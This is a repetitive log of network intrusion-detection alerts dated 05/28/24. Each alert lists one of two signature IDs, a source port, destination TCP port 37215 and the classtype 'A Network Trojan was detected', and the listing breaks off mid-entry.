            Timestamp:05/28/24-09:57:47.491323
            SID:2829579
            Source Port:51262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058505
            SID:2835222
            Source Port:36836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.839492
            SID:2835222
            Source Port:58236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870338
            SID:2835222
            Source Port:55460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869552
            SID:2829579
            Source Port:42066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.062883
            SID:2829579
            Source Port:56120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805209
            SID:2829579
            Source Port:50916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995789
            SID:2835222
            Source Port:49444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812538
            SID:2829579
            Source Port:40044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.560019
            SID:2835222
            Source Port:46438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052177
            SID:2829579
            Source Port:33312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.313321
            SID:2835222
            Source Port:57424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943264
            SID:2829579
            Source Port:58334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893393
            SID:2835222
            Source Port:42090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927631
            SID:2835222
            Source Port:33214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555348
            SID:2829579
            Source Port:44260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261128
            SID:2835222
            Source Port:39468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065433
            SID:2829579
            Source Port:43672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.339056
            SID:2829579
            Source Port:37354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818724
            SID:2835222
            Source Port:37844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.859450
            SID:2835222
            Source Port:52070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.309799
            SID:2829579
            Source Port:51708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697257
            SID:2835222
            Source Port:50238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.556690
            SID:2835222
            Source Port:32992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.623422
            SID:2829579
            Source Port:47018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.768027
            SID:2829579
            Source Port:41166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.614997
            SID:2835222
            Source Port:38554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.490928
            SID:2835222
            Source Port:44188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854755
            SID:2829579
            Source Port:42132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919674
            SID:2835222
            Source Port:41272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.565434
            SID:2829579
            Source Port:32874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.940776
            SID:2829579
            Source Port:48128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.347815
            SID:2829579
            Source Port:48764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.729880
            SID:2835222
            Source Port:33698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.863566
            SID:2829579
            Source Port:35430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.746438
            SID:2829579
            Source Port:53210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868648
            SID:2829579
            Source Port:52524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.882006
            SID:2829579
            Source Port:36212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806590
            SID:2829579
            Source Port:43522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434552
            SID:2829579
            Source Port:48784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.956069
            SID:2835222
            Source Port:43010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849501
            SID:2835222
            Source Port:59368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039213
            SID:2829579
            Source Port:54190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.917770
            SID:2829579
            Source Port:35340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.018938
            SID:2835222
            Source Port:40990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.879035
            SID:2829579
            Source Port:53284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537312
            SID:2829579
            Source Port:40576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436517
            SID:2829579
            Source Port:55666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.877548
            SID:2835222
            Source Port:52210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.993824
            SID:2829579
            Source Port:53320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917289
            SID:2829579
            Source Port:56746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450777
            SID:2835222
            Source Port:51912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563293
            SID:2835222
            Source Port:60700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772953
            SID:2835222
            Source Port:35202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870650
            SID:2829579
            Source Port:44866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841220
            SID:2835222
            Source Port:33990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811179
            SID:2835222
            Source Port:54204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871534
            SID:2835222
            Source Port:38174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.746299
            SID:2835222
            Source Port:57512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.916325
            SID:2835222
            Source Port:55262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.946361
            SID:2829579
            Source Port:53488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773752
            SID:2835222
            Source Port:55536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910158
            SID:2835222
            Source Port:54840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929127
            SID:2835222
            Source Port:45424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.682133
            SID:2835222
            Source Port:38836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818225
            SID:2835222
            Source Port:50798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.343199
            SID:2829579
            Source Port:50686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519031
            SID:2835222
            Source Port:36328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.996320
            SID:2829579
            Source Port:53678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.000448
            SID:2829579
            Source Port:36214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.843785
            SID:2835222
            Source Port:52404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.740924
            SID:2829579
            Source Port:36590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840347
            SID:2835222
            Source Port:51706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.139078
            SID:2835222
            Source Port:49136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836656
            SID:2835222
            Source Port:44300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.824621
            SID:2829579
            Source Port:50084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832221
            SID:2829579
            Source Port:37980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.804057
            SID:2829579
            Source Port:56982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862900
            SID:2835222
            Source Port:53188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862071
            SID:2835222
            Source Port:50504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.858478
            SID:2835222
            Source Port:56892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770720
            SID:2835222
            Source Port:38182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.425932
            SID:2835222
            Source Port:59222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.670918
            SID:2829579
            Source Port:53096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825137
            SID:2835222
            Source Port:59378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.305458
            SID:2835222
            Source Port:40492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943449
            SID:2835222
            Source Port:51598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956903
            SID:2835222
            Source Port:37870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064886
            SID:2835222
            Source Port:40248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935441
            SID:2835222
            Source Port:33024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374443
            SID:2829579
            Source Port:51444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.472850
            SID:2829579
            Source Port:53730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.565710
            SID:2829579
            Source Port:43260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730082
            SID:2829579
            Source Port:57236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.034261
            SID:2829579
            Source Port:56852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.050465
            SID:2835222
            Source Port:52340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.584047
            SID:2835222
            Source Port:55782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.617980
            SID:2829579
            Source Port:36492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.870815
            SID:2835222
            Source Port:37492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.331343
            SID:2835222
            Source Port:40640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.943031
            SID:2835222
            Source Port:34390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.910340
            SID:2835222
            Source Port:52876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605732
            SID:2829579
            Source Port:40364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.859710
            SID:2835222
            Source Port:50318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.650396
            SID:2835222
            Source Port:49100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756063
            SID:2835222
            Source Port:43238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.092127
            SID:2835222
            Source Port:57978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.822013
            SID:2835222
            Source Port:42036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.021304
            SID:2835222
            Source Port:33830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808368
            SID:2835222
            Source Port:59248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811012
            SID:2835222
            Source Port:52958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863004
            SID:2835222
            Source Port:48266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.077807
            SID:2829579
            Source Port:40684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919323
            SID:2829579
            Source Port:59376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057395
            SID:2835222
            Source Port:41968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899905
            SID:2829579
            Source Port:42188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260465
            SID:2829579
            Source Port:43476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.749948
            SID:2829579
            Source Port:33850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299278
            SID:2829579
            Source Port:59640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300173
            SID:2835222
            Source Port:53446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.710621
            SID:2835222
            Source Port:44140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432649
            SID:2829579
            Source Port:35512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251967
            SID:2829579
            Source Port:53016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.962393
            SID:2829579
            Source Port:34528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.816891
            SID:2829579
            Source Port:56174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.824187
            SID:2835222
            Source Port:46352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.250960
            SID:2835222
            Source Port:60056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045430
            SID:2829579
            Source Port:48240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.850231
            SID:2835222
            Source Port:56710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.431049
            SID:2829579
            Source Port:53456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865430
            SID:2829579
            Source Port:44222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811875
            SID:2835222
            Source Port:48186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857704
            SID:2835222
            Source Port:54918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862791
            SID:2835222
            Source Port:35778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.757748
            SID:2835222
            Source Port:34170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760063
            SID:2835222
            Source Port:54058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.038242
            SID:2829579
            Source Port:34908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.486849
            SID:2835222
            Source Port:41702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860751
            SID:2835222
            Source Port:40952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893970
            SID:2829579
            Source Port:34978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.358949
            SID:2829579
            Source Port:39014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644138
            SID:2835222
            Source Port:38808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.759957
            SID:2829579
            Source Port:43012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.957493
            SID:2835222
            Source Port:59182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910914
            SID:2835222
            Source Port:45462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505603
            SID:2829579
            Source Port:54314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605266
            SID:2829579
            Source Port:40622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.821868
            SID:2835222
            Source Port:46314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299894
            SID:2835222
            Source Port:35018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543436
            SID:2829579
            Source Port:55888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.408498
            SID:2829579
            Source Port:34334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954665
            SID:2829579
            Source Port:42136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.854734
            SID:2829579
            Source Port:42790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824665
            SID:2835222
            Source Port:60044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310545
            SID:2829579
            Source Port:38926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676317
            SID:2835222
            Source Port:40916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.804808
            SID:2829579
            Source Port:47502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.746019
            SID:2835222
            Source Port:50414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.381502
            SID:2835222
            Source Port:50776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532466
            SID:2829579
            Source Port:56448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.051392
            SID:2829579
            Source Port:52798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290963
            SID:2829579
            Source Port:55348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.488817
            SID:2835222
            Source Port:39368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.918860
            SID:2835222
            Source Port:50928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026939
            SID:2829579
            Source Port:41532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057949
            SID:2835222
            Source Port:59642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.525989
            SID:2835222
            Source Port:38056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000241
            SID:2835222
            Source Port:42146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.196299
            SID:2835222
            Source Port:60892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821757
            SID:2835222
            Source Port:50086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.965865
            SID:2835222
            Source Port:55410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872260
            SID:2829579
            Source Port:50508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.879151
            SID:2829579
            Source Port:34856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956500
            SID:2835222
            Source Port:45572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507232
            SID:2835222
            Source Port:59646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704697
            SID:2835222
            Source Port:33824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581889
            SID:2829579
            Source Port:34346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444693
            SID:2835222
            Source Port:33538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.942330
            SID:2829579
            Source Port:39722
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777699
            SID:2829579
            Source Port:33844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.059146
            SID:2829579
            Source Port:60612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.805213
            SID:2835222
            Source Port:38266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604387
            SID:2829579
            Source Port:56700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954537
            SID:2829579
            Source Port:54196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222058
            SID:2829579
            Source Port:56146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376869
            SID:2829579
            Source Port:35990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869935
            SID:2835222
            Source Port:34168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998458
            SID:2829579
            Source Port:53302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.938209
            SID:2835222
            Source Port:59426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326330
            SID:2829579
            Source Port:56462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.937345
            SID:2829579
            Source Port:40108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326736
            SID:2835222
            Source Port:34560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842673
            SID:2829579
            Source Port:40920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828966
            SID:2829579
            Source Port:46544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559262
            SID:2829579
            Source Port:45028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927174
            SID:2829579
            Source Port:58578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777773
            SID:2829579
            Source Port:59352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376805
